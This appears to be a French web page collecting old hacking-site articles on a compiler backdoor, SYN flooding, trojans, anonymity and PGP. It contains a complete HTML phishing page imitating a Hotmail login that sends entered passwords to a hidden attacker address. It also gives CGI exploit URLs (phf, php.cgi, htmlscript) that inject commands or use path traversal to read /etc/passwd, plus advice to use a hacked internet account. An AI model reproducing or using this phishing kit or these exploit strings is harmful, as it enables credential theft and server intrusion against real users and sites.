En 1983, Ken Thompson (un des auteurs de UNIX) révela l'existence d'une trappe dans les premières versions de UNIX qui pourrait être identifié comme l'un des plus malins pièges informatiques de tout les temps. Le compilateur C contenait du code qui reconnaissait quand la commande " login " était recompilée et insérait du code qui reconnaissait un certain mot de passe que Thompson avait choisi. Ce mot de passe lui ouvrait l'entrée du système qu'un compte utilisateur ou non ait été créé pour lui. Normalement ce genre de trappes peut être éliminé en la supprimant du code source du compilateur et en le recompilant. Mais pour recompiler le compilateur, il faut utiliser le compilateur. Donc, Thompson s'était aussi arrangé pour que le compilateur reconnaisse quand il compilait une version de lui-même et insérait dans le compilateur recompilé le code qui reconnaissait la procédure de compilation de la commande " login " ! De cette facon, le piège pouvait se perpétuer indéfiniment et laisser une trappe en place sans aucune trace dans les programmes sources.

Presque à chaque fois qu'un hacker quitte un système, il laisse derrière lui une ou plusieurs trappes pour être capable de revenir quand il veut. C'est pourquoi, quand un système a été attaqué, il est plus prudent de vérifier tout le système de fichiers ou bien de ré-installer le système d'exploitation.

9. Le TCP-SYN flooding

Quand un système client essaie d'établir une connexion TCP à un système fournissant un service (le serveur), le client et le serveur échange une séquence de messages. Cette connexion technique s'applique à toutes les connexions TCP-IP (Telnet, Web, email, etc ...)

Le système client commence par envoyer un message SYN (pour synchronisation) au serveur. Le serveur renvoie alors un accusé de reception du SYN: SYN-ACK (pour synchronisation-aknowledgment) au client. Le client finit alors par établir la connexion en répondant par un ACK. La connexion entre le client et le serveur est donc ouverte et le service d'échange de données peut s'exécuter entre les deux partenaires de la connexion.

Voici un petit récapitulatif de ce qui se produit pour l'établissement d'une connexion :

Client Serveur ------- --------- SYN --------------> <--------------- SYN-ACK ACK -------------->

Le serveur et le client peuvent donc commencer à s'échanger des données. Les abus viennent au moment où le serveur a renvoyé un accusé de reception du SYN (ACK-SYN) au client mais n'a pas recu le " ACK " du client. C'est alors une connexion à demi-ouverte. Le serveur construit dans sa mémoire système une structure de données décrivant toutes les connexions courantes. Cette structure de données est de taille finie, ce qui veut dire qu'il peut se créer un dépacement de capacité (overflow) en créant intentionellement trop de connexions partiellement ouvertes.

Le fait de créer ces demi-connexions sans se faire repérer est facilement réalisable avec l'IP spoofing. L'ordinateur de l'agresseur envoie des messages SYN à la machine victime ; ceux-ci paraissent provenir d'un ordinateur bien défini mais qui en fait, fait référence à un système client qui n'est pas capable de répondre au message SYN-ACK. Ce qui veut dire que le message ACK final ne sera jamais renvoyé au serveur victime.

Ces demi-connexions dans la structure de données du serveur victime vont éventuellement créer un débordement dans cette structure et le serveur sera incapable d'accepter d'autres connexions tant que la table ne sera pas vidée. Normalement, il y a un système de " time-out " associé à chaque connexion ouverte, donc les demi-connexions devraient expirer et le serveur victime récupérer de la place libre dans sa mémoire pour d'autres connexions. Toutefois, le système agresseur peut simplement continuer à envoyer des paquets dont l'IP est spoofée plus vite que le serveur victime puisse expirer les demi-connexions.

Dans la plupart des cas, la victime d'une telle attaque aura des difficultés à accepter toute nouvelle connexion. Dans ces cas, l'attaque n'affectera pas les connexions déjà existentes ou la capacité à créer des connexions de l'intérieur vers l'extérieur. Par contre, dans certains cas, le serveur peut épuiser toutes ses ressources mémoires, tomber en panne ou être rendu inopérant.

La localisation de l'attaque est très souvent obscure parce que les adresses des paquets SYN envoyés ne sont très souvent pas plausibles. Quand le paquet arrive au serveur victime, il n'y a pas de moyens de déterminer sa véritable source. Comme Internet fait suivre les paquets basés sur une adresse de destination, le seul moyen de valider la source d'un paquet est d'utiliser le filtrage.

10. Conclusion

Il y a encore une grande variété d'autres méthode d'attaques mais elle sont d'un niveau relativement élevé pour un utilisateur normal d'UNIX. Voici une courte liste de quelques une d'entre elles :

- attaque NIS et NFS

- attaque rlogin et remote shell

- attaque par interception de processus administrateurs.

Ce n'est absolument pas une liste exhaustive car il existe probablement beaucoup de type d'attaques beaucoup plus poussées.

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________

La plupart des internautes ont les même mots de passe pour leur compte mail et leur site Web. Les pirates profitent parfois de cette faille de sécurité. Alors les pirates crééent un compte mail pas trop voyant (style : hotmail_staff@caramail.com), et envois ensuite le code html qui suit en mail, ce qui recréra l'interface de HOTMAIL et manipulera l'internaute qui reçoit le mail. L'internaute rentrera donc son login et son mot de passe et tout cela sera immédiatement expédié au pirate auteur du mail. (En rouge se trouve l'adresse e-mail du pirate)

Code source html :

<html><head></head>
<body bgcolor="#ffffff" link="#000099" vlink="#000099">
<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>
<tr valign=middle><th colspan=2>
<font face="Arial, Helvetica" size="5">We're Sorry, We Cannot<br>
Process Your Request</font>
</th></tr>
<tr valign=middle><td align=center>
<font face="Arial, Helvetica" size="3">Reason:&nbsp;</font>
<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time expired for your account. Please
re-login.</b></font><br>
</td></tr>
<tr valign="middle"><td align="center">
<FORM METHOD="POST" NAME="hotmail"
ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"
target="_parent">
<INPUT TYPE="hidden" NAME="recipient"
VALUE="pirate@piratage.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">
<INPUT TYPE="hidden" NAME="return_link_url"
VALUE="http://www.hotmail.com/cgi-bin/start/">
<table cellpadding="0" cellspacing="5" border="0">
<tr><td><font face="Arial, Helvetica" size="2">Login
Name:</font><br><input
type="text" name="login" size="16" maxlength="16"></td><td><font
face="Arial,
Helvetica" size="2">Password:</font><br><input type="password"
name="passwd"
size="16" maxlength="16">&nbsp;<input type="submit"
value="Enter"></td><tr>
</table></FORM></td></tr>
<tr valign=middle><th colspan=2 align=center>
<font face="Arial, Helvetica" size="3">Return to <a
href="http://www.hotmail.com"
target="_parent">Hotmail's Homepage</a>.
</font></th></tr></table>
<font size=2 color=black>1996-1999. Hotmail© all rights reserved.</font>

Bien sûr ce code source peut être remanié et ainsi un pirate peut essayer d'obtenir les mots de passe de n'importe quel internaute, qu'il soit sur Free, AOL, etc... Cette astuce toute simple doit être retouchée car à ce jour Hotmail à pris les mesures nécessaires pour contrer cette manipulation du code source, mais gageons qu'un pirate ayant quelques connaissances en html n'aura pas de problème pour réitérer ce type de piratage.

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________
Programmes démarrant automatiquement

Voici la liste des choses à regarder sur votre PC pour constater les programmes qui selancent automatiquement à chaque démarrage. Cette liste est utile pour savoir quels sont les programmes qui sont inutilkes et qui prennent donc de la mémoire inutilement, ainsi que pour constateer si un virus ou un cheval de Troie ne s'est pas discrètement installé sur votre PC.


______________________________________________________
le programme CGI-BIN

Le titre ne vous dira peut-être rien, d'ailleurs, je n'aurais pas écris l'article je n'en aurais pas la moindre idée non plus =). On va prendre un exemple pour expliquer le titre alors. Vous avez sûrement remarqué quand vous allez dans un site un "cgi-bin" au niveau de l'url. Il y en a très souvent dans les moteurs de recherche. Alta Vista en est d'ailleurs un très bon exemple. Vous allez sur Alta Vista et vous tapez hacking et choisissez la langue française, lancez la recherche. L'url de la page deviendra la suivante :

"http://www.altavista.com/cgi-bin/query?pg=q&kl=fr&q=hacking&search=Search"


Vous l'avez vu le cgi? Ce n'est rien d'autre que ça. En gros c'est un programme écrit en pearl ou en c (ou en d'autres langages mais ce sont les plus répandus) qui permet des accès à l'intérieur du serveur par mot clé. Certaines séries de lettres représentent des touches tapées comme "Enter" par exemple. Ce qui fait qu'en mettant une adresse on exécute un programme, qui, s'il est buggé (plutôt si un pirate connaît le bug), agira en fait comme un outil de recherche genre "explorateur windows". Un cgi peut vraiment faire beaucoup de choses : recherche de fichiers, compteur de visites, animations, etc... Son utilisation dans les sites est très répandu vu qu'il a à peu près le même potentiel qu'un script Java. Sacré potentiel n'est ce pas?
Ci-dessous différentes manières que les pirates utilisent pour exploiter ces bugs pour devenir root ou pour faire d'autres choses de ce genre juste avec Netscape. Sachez qu'à ma connaissance il y a au moins 130 bugs cgi trouvés d'où de quoi pas mal s'amuser lorsque l'on est pirate. Ici je n'en donne que quelques uns à titre d'exemple.


Pfs :
Des filtres pas très au point sur certaines requêtes permettent d'accéder au fichier contenant le password root sur les serveur tournant sous NCSA (version inférieure ou égale à 1.5 ) et sous apache (versions inférieures à 1.0.5) :
http://url_du_site/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Exemple : http://www.whitehouse.com/cgi-bin/phf?Qalias=x%0a/bin%20/etc/passwd


Pfs (un autre bug) :
Idem mais là, la commande change vraiment très peu et ça ne marche pas que sur ceux énumérés au dessus :
http://url_du_site/cgi-bin/phf?Qname=x%0a/bin/cat%20/etc/passwd
Exemple : http://www.whitehouse.com/cgi-bin/phf?Qname=x%0a/bin%20/etc/passwd


Php :
Même chose que ci-dessus sauf que c'est avec php. La syntaxe n'est pas la même mais le résultat est identique, le pirate a le pass root :
http://url_du site/cgi-bin/php.cgi?/etc/passwd
Exemple : http://www.whitehouse.com/cgi-bin/php.cgi?/etc/passwd


Php (un autre bug) :
Idem mais là, la commande change vraiment très peu :
http://url_du site/cgi-bin/php?/etc/passwd
Exemple : http://www.whitehouse.com/cgi-bin/php?/etc/passwd


Query :
Là c'est encore la même chose mais ça marche avec query :
http://url_du site/cgi-bin/query?%0a/bin/cat%20/etc/passwd
Exemple : http://www.whitehouse.com/cgi-bin/query?%0a/bin/cat%20/etc/passwd


Htmlscript :
Là aussi ça sert à devenir root en trouvant le pass root, le tout est de savoir où se trouve le répertoire /etc par rapport au cgi-bin. Si le pirate connait l'arborescence des répertoires sous UNIX et il n'a donc aucun problème pour se repérer, surtout qu'il n'est pas obligé de mettre /etc/passwd mais par exemple: /usr/das, sous peine bien sûr que le fichier das et le répertoire /usr éxistent.
http://url_du_site/cgi-bin/htmlscript?../../etc/passwd
Exemple : http://www.whitehouse.com/cgi-bin/htmlscript?../../../etc/passwd
Dans cet exemple il s'agissait de redescendre à la racine là où se trouve le répertoire /etc et pour cela le pirate est descendu de trois niveaux vu que dans cet exemple, le cgi-bin se trouvait dans le répertoire :
/web/info/revelation. Mais ce n'est qu'un exemple. Le cgi-bin pourrait très bien se trouver dans le répertoire : /bin/das et il aurait été obligé de faire : http://www.whitehouse.com/cgi-bin/htmlscript?../../etc/passwd.
Si vous voulez comprendre la structure de ces exploits, je vais vous les expliquer un peu. le %0a correspond à un "enter" en pearl et le %20 a un "espace" en pearl. Les cat est un éditeur sous unix et le fait de faire "cat%20/etc/passwd" aura l'effet de faire "cat passwd" dans le répertoire /etc ce qui aura pour effet de dévoiler l'interieur du fichier comme il serait possible de le faire avec word.


Dans quel cas les cgi phf et autres scripts ne servent à rien? Si le serveur a ses pages web transistant par le port 8000, 8001 ou 8080 ça ne sert à rien d'essayer car même si les bugs des cgi sont présents, le pirate ne pourra pas acceder au répertoire contenant le fichier passwd. En effet le http passe le plus courement par le port 80 mais le port 8080 est aussi très souvent utilisé notamment pour ce qui concerne les proxy. Les ports 8000 et 8001 sont assez peu utilisé. Le pirate peut recupérer le passwd avec les cgi si le http passe par le port 80 car c'est un port privilégié et les 8080, 8000 et 8001 ne le sont pas. Un port privilégié signigie que seul le root ou une personne loguée en tant que root peut l'utiliser ou utiliser des programmes faisant transiter des paquets par celui ci. Pour savoir si un serveur a son http sur le port 80 ou autres c'est assez simple, le pirate met "
:n°_du_port" apres son DNS.
Exemple : si le serveur a son http à l'adresse http://www.whitehouse.com/, il fait
http://www.whitehouse.com:80/ et si la page reste la même il est sur le port 80. Bien sur s'il obtiend une page vide avec des mots comme "not found" genre ce que l'on trouve en faisant http://www.fbi.gov:8080/ ou une page non attribuée, c'est que le http ne se trouve pas sur le port qu'il avait demandé.
Bien sûr je n'ai pas tout à fait raison quand je vous dis que les scripts cgi ne servent à rien si le http n'est pas lancé en root. Cela pourra toujours vous donner un acces user sur la bécane si le bug est présent. Et on ne devient pas toujours root tout de suite (et même loin de là) et l'acces user est toujours plus important qu'un acces en anonymous surtout que si l'account de cet user a servi au http il a peut être servi à autre chose. Mais il se peut aussi que cet account soit stérile car l'admin a très bien pu utiliser un port différent du 80 par mesure de sécurité et donc a prévu le fait que l'account sous lequel il a lancé le http soit piraté par la suite.

 

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________
Eviter les trojans :
Un trojan est le terme employé pour désigner BackDoor. En fait on devrait appeler trojan, un programme (presque virus) qui s'infiltre à l'insu d'un utilisateur pour foutre son merdier, selon ses capacités. Une BackDoor fonctionnant presque sur le même principe, le terme a été généralisé, et ce n'est plus une erreur de dire "trojan" (ou troyan, ou troyen au pluriel), à la place de BackDoor.

Le trojan a la particularité de créer une voie d'accès à votre système: c'est d'ailleurs l'un des moyens les plus simples (en général les lamers aiment bien ce genre de programmes juste pour faire joujou), et les plus rapide et efficace de créer une faille vers votre système: en effet une fois le trojan (appelé partie serveur) éxcécuté, l'attaquant peut directement se connecter sur votre système avec la partie client. Actuellement les trojans les plus usités sont: Back Orifice (et Back Orifice 2000), Netbus (1.3, 1.7, 2.0), Subseven 1.3, Socket de Troie etc. Parmis ceux-là on devrait appeler intrus celui qui l'est: Back Orifice. Ce "trojan" est un réalité un programme (un vrai) qui a été créé dans un but nuisible mais non avoué: en effet il permet d'administrer un réseau plus directement qu'en étant sur le réseau. Bref, ça ne change rien quand à son utilisation nocive.

Pour éviter de choper un de ces trojans, des programmeurs ont mis au point plusieurs anti-troyens, le plus connu étant le BouffeTroyen. Ce programme détectait une grande quantité des trojans qui pouvaient exister sur votre système, mais comme tout programme, il se fait vieux. Alors se sont suivis des anti-trojans spécifiques: Anti-Socket de Troie, Anti BO, Netbuster... Mais ces programmes ne constituent pas les protections les plus efficaces, mieux vaut prévenir que guérir, ce que font les Firewalls c'est de détécter une tentative de connection sur les ports surveillés, qui sont ceux par défauts utilisés par les trojans les plus connus. D'autres firewalls, détectent presque toutes les tentatives de connection: ce qui amène a des plantages. Lockdown 2000 est un de la première catégorie: une fois une tentative de connection détectée, il fait un Traceroute (tracert) sur l'IP qui a tenté la connexion et en vous prévenant. Ce merveilleux Firewall scanne aussi la présence d'infections dès son lancement.

La meilleure des protections restent les anti-virus qui détectent les trojans pré-repérés, ou encore les programmes qui se définissent à s'inscrire sur le système ou dans d'autres programmes : ainsi les programmes pour détécter les jeux sont détectés comme infectés, ces anti-virus, vous les connaissez: AVP (AntiViral toolkit Pro) et Norton (la version 2000, qui détecte les trojans, est sortie). Ce sont là les deux meilleurs anti-virus qui sont à disposition de chacun. Un autre truc quand on n'a rien installé et qu'on veut rapidement vérifier si une personne s'est connectée à soi, c'est d'aller sous dos (répertoire C:\windows par défaut) et de taper 'netstat': cela vous affichera tout ce qui est en train de se connecter à vous, sur quel port, et l'IP de la "chose" qui essaye de se connecter. Vous verrez OBLIGATOIREMENT des IP s'afficher, mais ne stressez pas: c'est normal. Surtout si vous faites de l'ICQ, ou autres.

 

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________
Etre anonyme

Le rêve de tout pirate est d'être anonyme et intraçable... C'est possible ça ? Ca dépend des circonstances.

Quand vous passez quelque part sur Internet, vous laissez des traces de votre passage. Elles sont d'autant plus grandes que votre vigilance est faible. Dans certains cas, cela est sans conséquences dans d'autres cela peut se révéler dangereux.
Voici une liste des différentes combines utilisées par les pirates pour être le plus discret et intraçable possible.

-Aller sur www.safeweb.com rubrique "quickstart". Tout pour la protection de la vie privée sous la forme d'un prog qui s'intègre dans le navigateur

-Refuser les cookies (avec Netscape ou un log.) des sites qui font des bases de données et avec lesquels il faut rester discret

-Donner de fausses coordonnées lors de la souscription d'un accès à Internet ou utiliser un compte Internet piraté

-Passage par un proxy HTTP ou SOCKS différent de celui du fournisseur Internet

-Utiliser des softwares comme PrivateSurfer ou Freedom et plein d'autres encore...

-Mettre 3651 devant le N° TEL du provider

-Utiliser un compte de mail anonyme

Voilà, c'est une liste courte de quelques astuces (il en existe plein d'autres) utilisées par les pirates.

 

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

 


______________________________________________________
Sécuriser son site web

 

Il faut bien comprendre qu'aucune sécurité n'est efficace à 100%, mais les astuces qui vous seront fournis dans le texte à suivre vont vous permettre d'éviter que n'importe qui puisse pirater votre site...

Sécuriser son site web :

Lors de l'inscription sur un serveur d'hébergement, on vous demande de remplir un formulaire qui correspond à votre profil d'utilisateur (nom, prénom, adresse, etc...). Le mieux à faire est de ne surtout pas mettre ses informations réelles, mais des infos bidons (je sais que cela est normallement interdit par les hébergeurs mais bon, c'est question de sécurité). Pour deux raisons :

- Le serveur peut-être amené à faire des listing d'utilisateurs, et les diffuser à d'autres serveurs avec lesquels ils travaillent...

- Des failles permettent d'exploiter ces informations. De plus il est conseillé de ne pas souscrire à de mailing lists ou de newslists, etc... des utilisateurs malveillants pourraient dresser un profil de votre personnalité.

Enfin, n'oubliez pas de choisir un password mélangeant majuscules, minuscules, chiffres et lettres comme Ank58K2r, voir le tutorial "choix de mot de passe" pour plus d'expliquation sur ce point.

 

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________
email et sécurité

Avec l'utilisation toujours croissante du courrier électronique (E-Mail) comme mode de communication sur Internet ainsi que d'autres services, la sécurité de ce type de courrier devient de plus en plus importante. De nombreux utilisateurs se posent des questions telles que :

Q : Peux-on intercepter le courrier électronique ?

R : Oui, l' E-mail n'est pas sur. Il est possible d'intercepter des messages éléctroniques.

Q : Peux-on envoyer du courrier électronique sous un faux nom ?

R : Oui, toute personne peux masquer son identité sur le Net.

Internet et les services de courrier électronique que l'on peux y trouver ne sont pas surs!
A travers ce document, vous pourrez découvrir pourquoi les services mail ne sont pas surs et comment y remédier.

1) Les E-Mail privés.

Imaginons que vous vous serviez du courrier électronique pour envoyer des messages dans une entreprise. Il se pourait qu'au cours de cette courte correspondance, vous échangiez des détails intimes (je sais pas moi, une déclaration d'amour :). Votre employeur n'aurait aucune difficulté à les lire...
Tenez-vous réellement à ce que votre employeur soit parfaitement au courrant de votre vie privée? Si c'est non (enfin j'espere), il est nécessaire que vous protégiez vos lettres des regards indiscrets.

2) Probleme de sécurité.

Les informations transmises par courrier électronique sur Internet le sont en texte clair.
Ces textes sont stockés sur n'importe quel ordinateur Internet. Ils sont tenus à la disposition du destinataire pour qu'il les recoive sur simple demande. Voila pourquoi les personnes indiscretes disposent de multiples occasions pour lire les messages d'autres utilisataires. En fait, ces "voyeurs" doivent accéder à des parties déterminées sur un réseau :

Le courrier électronique est la plupart du temps transmis via le SMTP (simple mail transfert protocol). Lors de cette transmission, des paquets de données sont envoyées sur un réseau (Internet). Tres souvent, l' E-Mail n'est pas directement transmis au destinataire mais sauvegardé temporairement. Votre E-Mail restera un certains temps sur un serveur, en clair! C'est bien sur à ce moment là que les messages peuvent etre lus et copier par des responsables du serveur ou par des hackers.
On pourrait se demander alors si des messages sont lus sur Internet et combien...

3) Identification.

Bien que tous les E-Mail disposent d'une adresse d'expéditeur, cette information n'est pas fiable! Il est facile de s'amuser à envoyer des messages sous un faux nom. Suivre des messages reste possible jusqu'à un certain point. Quand une communication est transmise via divers ordinateurs, c'est à peine si l'on sait réellement d'ou elle vient à l'arrivée.
Il est donc presque impossible de distinguer si un E-Mail est, dans l'état présent, un original ou ce que l'on pourrait appeler "falsification".

4) Codage d' E-Mail.

Il existe de nombreux systemes de codage qui permettent, jusqu'à un certain point, de garantir fiabilité et authenticité. En fait, aucun programme ne peut à ce jour garantir 100 % de sécurité. Dans le cas le plus simple, l'expéditeur et le destinataire s'accordent sur une "clé" déterminée. De tels procédés que si vous disposez d'un moyen de communication sur pour vous mettre d'accord sur une clé (ne faite pas ca sur IRC), et notre bon vieux téléphone n'est pas plus sur qu'une lettre...

5) Systeme à clé publique.

Puisqu'il est rare de trouver une voie de communication sure, d'autre procedés de codage permettant la transmition de la fameuse clé sont tres souvent utilisés de nos jours. Chaque utilisateur crée deux clés: La premiere est communiquée de facon "publique". Grace à cette clé toutes les autres personnes chiffrent le courrier destiné à un correspondant.
Ce n'est qu'avec la seconde clé perso que le correspondant pourra déchiffrer son courrier:
C'est la raison pour laquelle cette clé personnelle doit etre secrete.

6) PGP

PGP- Pretty Good Privacy est le systeme à clé publique le plus répendu. Il permet :

- De coder des lettres.

- De les signer électroniquement.

Une signature életronique garantit qu'un courrier a réellement été rédigé par une personne déterminée. Pour vérifier l'authenticité d'une signature, le destinataire utilise pour le décodage la clé publique. Si le déchiffrage du courier ne peux etre effectué; cela signifie que le message a été manipulé.

7) PGP suite

A partir d'un message que l'on aura signé, on crée un "extrait" ayant les caractéristiques de ce message. Cet "extrait" est ensuite codé à l'aide de la clé et transmis avec le courrier si le destinataire veut vérifier l'authenticité de la signature, il doit déchiffrer l'extrait codé au moyen de la clé publique de l'expéditeur et doit créer un autre extrait (et oui...) du courrier lisible. Si les deux extraits se recoupent, l'authenticité du courrier et démontrée. Cette methode, disponible dans PGP (le logiciel), permet aux utilisateurs ne possédant pas PGP (oui et ils ne sont pas rares)de lire des courriers signés.

8) Clé PGP.

Bien que les possibilités de PGP présentées ici nous permettent déjà de coder et de signer des messages, d'autres questions se posent. La premiere concerne la maniere dont une personne peut faire parvenir un message chiffré à un autre utilisateur avec lequel elle n'a encore aucun contact... Il ne faut pas oublier que la clé doit rester secrete...
Prennons un exemple :

Une personne A voudrait communiquer avec une peronne B qu'il ne connait pas encore.
Si A voulait communiquer avec B, il lui demanderait d'abord sa clé publique.
Et si une personne C pouvait intercepter ce message et envoyer à la place de B, une réponse avec une fausse clé, C serait alors le seul à pouvoir lire ces lettre. A penserait communiquer avec B alors qu'elle communiquerait avec C...
Comment peut on alors reduire cette possibilité d'aggression ?

9) Serveur de Clé.

Les serveurs de clés sont des ordinateurs d'acces public, qui recueillent des clés publiques et qui les envoient sur demande (sympas non ?). Toute personne peut donc y trouver des clés publiques des autres utilisateurs (seulement si ils sont enregistrés).

Les serveurs de clés pourraient pour etre pris en otage par des hackers, ne l'oublions pas...


10) La "chaine" de confiance.

Le principe sur lequel elle est fondée est le suivant: des personnes qui se connaissent ou bien, qui sont sure de l'existence réelle de l'autre, signent leur clés publiques. La signature d'une clé correspond à celle d'un message. Si B désire signer la clé publique de A, alors il la code avec sa propre clé privée.

Une chaine de confiance est crée quand de nombreux utilisateurs PGP signent entre eux des clés publiques.

11) "Empreintes digitales".

Toute clé publique PGP sera clairement marquée d'une "empreinte digitale". Une telle empreinte est aussi unique que chaque clé. Elle permet d'attribuer de maniere fiable une clé PGP à une personne. Par exemple, si une personne vous transmet son empreinte digitale, vous serez certain que la clé est bien la sienne. Il faut bien sur que la personne puisse vous envoyer ses empreintes digitales :] ...

12) Sécurité avec PGP.

La fiabilité de codage tel que PGP repose sur l'importance des moyens que devrait employer un agresseur pour calculer la clé privée. En effet il existe des "cracker PGP", vous pourrez vous en procurer tres certainement sur http://neworder.box.sk. Sachez qu'il aura fallu 8 mois à une organisation pour cracker une telle clé...
Ceci devrez vous donnez une idée des moyens qu'il faudrait utiliser pour casser une clé...

13) Logiciels PGP (enfin!).

Il existe différentes versions de PGP :

- Des versions non commerciales pour un usage aux Etats-Unis et le Canada UNIQUEMENT.

- Des versions commerciales pour les E-U et le Canada.

- Des versions internationnales non commerciales.

Conclusion

Et voilà s'en est fini avec le PGP, cependant si vous voulez plus d'informations dessus, allez donc voir ces sites :

Serveur officiel : ftp://ftp.pgp.net/pub/pgp
Bon site en anglais bien sur : http://www.pgp.com
Et bien sur en fancais : http://www.yahoo.fr/Informatique_et_multimedia/Securite_et_cryptage/Pretty_Good_ Privacy__PGP_/

 

Texte tiré du site Evolvae Hackers Network
( Vous pouvez recopier ce texte ou le mettre
sur votre site du moment que vous mettez
un lien vers EH Network )
[ http://www.evolvae.cjb.net ]

______________________________________________________

Microsoft est connu pour cacher des "easters eggs" (programmes cachés) dans ses logiciels (les mauvaises langues prétendent qu'ils occupent plus de place que les logiciels eux-mêmes...). Voici maintenant qu'il propose des pages cachés sur ses sites. Par exemple, sur les pages présentant Windows XP, en effectuant la combinaison Ctrl+X puis P, on obtient chez Microsoft France ( http://www.microsoft.com/france/ms.htm ) un screensaver, et chez Microsoft Benelux ( http://www.microsoft.com/belux/msfr.asp ) une animation Flash. Microsoft a également inclus des easters-eggs involontaires. Par exemple, dans l'une des animations Flash présentant l'une des nouvelles fonctions du système sur le site de Microsoft France ( http://www.microsoft.com/france/windows/xp/docs/flash/xppro_fr.swf ), on a pu admirer à titre d'exemple... un PowerMac 8xxx d'Apple ! (l'image, provenant d'une banque d'images, a été retiré assez rapidement). Une bourde plutôt gênante dans le cadre d'une campagne publicitaire mondiale évaluée à 1 milliard de dollars... Autres soucis, la présentation du nouveau système en public par Bill Gates n'a pas été très convaincante. Pour vanter ses fonctions de créations numériques, plusieurs démonstrations ont été effectuées, ce qui a permis de mettre en évidence quelques bugs (une webcam déficiente, un système de reconnaissance vocale au fonctionnement aléatoire...).

http://newsletter.ifrance.com/newsletter/news/Les%20news%20du%2028_10_2001%20-%20%E9dition%2094.html


______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________

______________________________________________________